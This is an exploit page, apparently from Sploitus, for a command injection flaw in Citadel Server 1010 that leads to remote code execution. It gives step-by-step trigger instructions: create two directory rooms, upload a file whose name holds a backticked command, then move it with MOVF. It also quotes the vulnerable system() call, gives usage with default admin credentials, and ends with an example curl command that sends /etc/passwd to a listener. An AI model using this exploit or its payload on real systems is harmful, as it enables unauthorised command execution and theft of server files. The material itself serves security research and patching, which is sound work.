## https://sploitus.com/exploit?id=F4645DE9-EDF0-5CC3-AECD-AB65D2F89D27
## Citadel Server Command Injection Vulnerability
Author: Augustus
Description: This script exploits a command injection vulnerability in the Citadel Server leading to RCE.
Tested on: Citadel Server 1010
### Prerequisites:
- Citadel server port (default: 504) exposed.
- An account with admin privileges to edit room settings. (May not be required if there exists 2 directory rooms already with the correct permissions)
- At least one of the rooms needs to allow uploads.
### To trigger the exploit:
- Create 2 directory rooms. At least one of which needs to allow uploads.
- Upload a file to one of the rooms. The filename is the command to execute encapsulated in '`' or whatever command injection technique you want.
- Move the file to the other room with the `MOVF` command through port 504. This triggers the command injection.
### Vulnerability
The function `cmd_movf` in `serv_file.c` is vulnerable to a command injection attack. Unsanitized user input is used to create a command. This command is executed using `system()`. The parameters `CC->room.QRdirname`, `filename` and `qrbuf.QRdirname` are controlled by the user.
```c
<...>
snprintf(buf, sizeof buf, "cat ./files/%s/filedir |grep \"%s\" >>./files/%s/filedir", CC->room.QRdirname, filename,
qrbuf.QRdirname);
system(buf);
cprintf("%d File '%s' has been moved.\n", CIT_OK, filename);
```
### Usage
```
$ python3 exploit.py -h
usage: exploit.py [-h] --host HOST [--port PORT] --cmd CMD [--username USERNAME] [--password PASSWORD]
Command injection exploit for Citadel Server 1010
options:
-h, --help show this help message and exit
--host HOST IP address of the remote host
--port PORT Port number of the Citadel messaging server
--cmd CMD Command to execute on the Citadel server
--username USERNAME Username (default: admin)
--password PASSWORD Password (default: citadel)
```
### Example
```sh
python3 exploit.py --host 127.0.0.1 --port 504 --cmd 'curl http://127.0.0.1:9001/ -d "`cat /etc/passwd`"'
```